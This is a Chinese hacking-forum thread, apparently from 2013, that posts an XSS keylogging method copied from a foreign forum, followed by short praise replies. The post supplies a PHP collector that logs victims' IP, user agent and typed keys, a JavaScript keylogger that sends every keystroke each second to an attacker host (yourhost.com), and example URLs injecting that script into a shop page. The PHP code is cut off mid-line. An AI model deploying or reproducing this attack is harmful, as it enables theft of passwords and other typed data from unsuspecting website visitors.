查看: 2237|回复: 25

XSS的键盘记录

[复制链接]
发表于 2013-1-28 09:49:42 | 显示全部楼层 |阅读模式

转自国外安全研究论坛

这种方法是非常公开的,但很多人仍然不知道它。
cookie时,从目标不能重复使用,您可以使用此方法。 你需要一台主机上传:
g.php
PHP Code:

<?php$Keylog = $_GET["c"]; $reffer = $_SERVER['HTTP_REFERER']; $ip = $_SERVER['REMOTE_ADDR']; $date=date ("l dS of F Y h:i:s A"); $port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('data.txt', 'a'); fwrite($file, 'Ip: '.$ip."\n"); fwrite($file, 'Port: '.$port."\n"); fwrite($file, 'Refferer: '.$reffer."\n"); fwrite($file, 'User Agent: '.$user_agent."\n"); fwrite($file, 'Date: '.$date."\n"); fwrite($file, $Keylog."\n"); fwrite($file, "---------------------------\n\n"); fclose($fi

k.js:
PHP Code:

var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://yourhost.com/g.php?c='+keys; keys = ''; }, 1000);

一个新的文件名 为data.txt的和chmod 777 data.txt中, 您可以使用它像这样:

Code:

http://monkey.com/shop.php?article=12<script src="http://yourhost.com/k.js"></script>


代码:

http://monkey.com/shop.php?article=12<script language="JavaScript" src="http://yourhost.com/k.js"></script>

&#8203;


发表于 2013-1-28 19:10:50 | 显示全部楼层
慢慢来,呵呵  
发表于 2013-1-31 11:17:28 | 显示全部楼层
呵呵,等着就等着....  
发表于 2013-2-2 04:53:18 | 显示全部楼层
厉害!强~~~~没的说了!  
发表于 2013-2-5 22:52:46 | 显示全部楼层
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
发表于 2013-2-7 11:27:43 | 显示全部楼层
看看..  
7299189 该用户已被删除
发表于 2014-9-22 16:51:40 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-26 12:03:50 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2015-1-26 16:08:45 | 显示全部楼层
努力,努力,再努力!!!!!!!!!!!  
发表于 2015-2-28 17:57:49 | 显示全部楼层
要不我崇拜你?行吗?  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则